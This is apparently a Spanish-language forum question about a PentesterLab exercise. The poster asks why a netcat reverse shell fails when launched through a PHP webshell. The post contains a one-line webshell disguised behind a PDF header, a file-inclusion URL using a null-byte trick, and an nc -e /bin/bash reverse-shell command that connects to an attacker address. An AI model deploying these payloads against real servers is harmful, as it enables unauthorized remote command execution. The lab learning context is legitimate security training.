Estoy haciendo un ejercicio de PentesterLab, tengo un webshell llamado 1.pdf y se puede incluir en index.php como un archivo PHP. Contiene código como este:
%PDF-1.4
<?php
echo system($_GET["cmd"]);
?>
Ahora quiero crear una shell inversa usando nc con los siguientes comandos, pero no funciona correctamente:
index.php?page=uploads/1.pdf%00&cmd=/bin/nc 192.168.117.128 8001 -e /bin/bash
Si ingreso comandos en 192.168.117.128 y luego ingresa, no se generó ningún resultado.
Mientras, si ejecuto los siguientes comandos directamente en la máquina virtual (el servidor de destino), se conecta al atacante correctamente:
/bin/nc 192.168.117.128 8001 -e /bin/bash
La salida de los comandos se repite correctamente en 192.168.117.128
Me pregunto por qué netcat funciona correctamente en VM pero no funciona en webshell.
Se agradece la ayuda de cualquiera, gracias.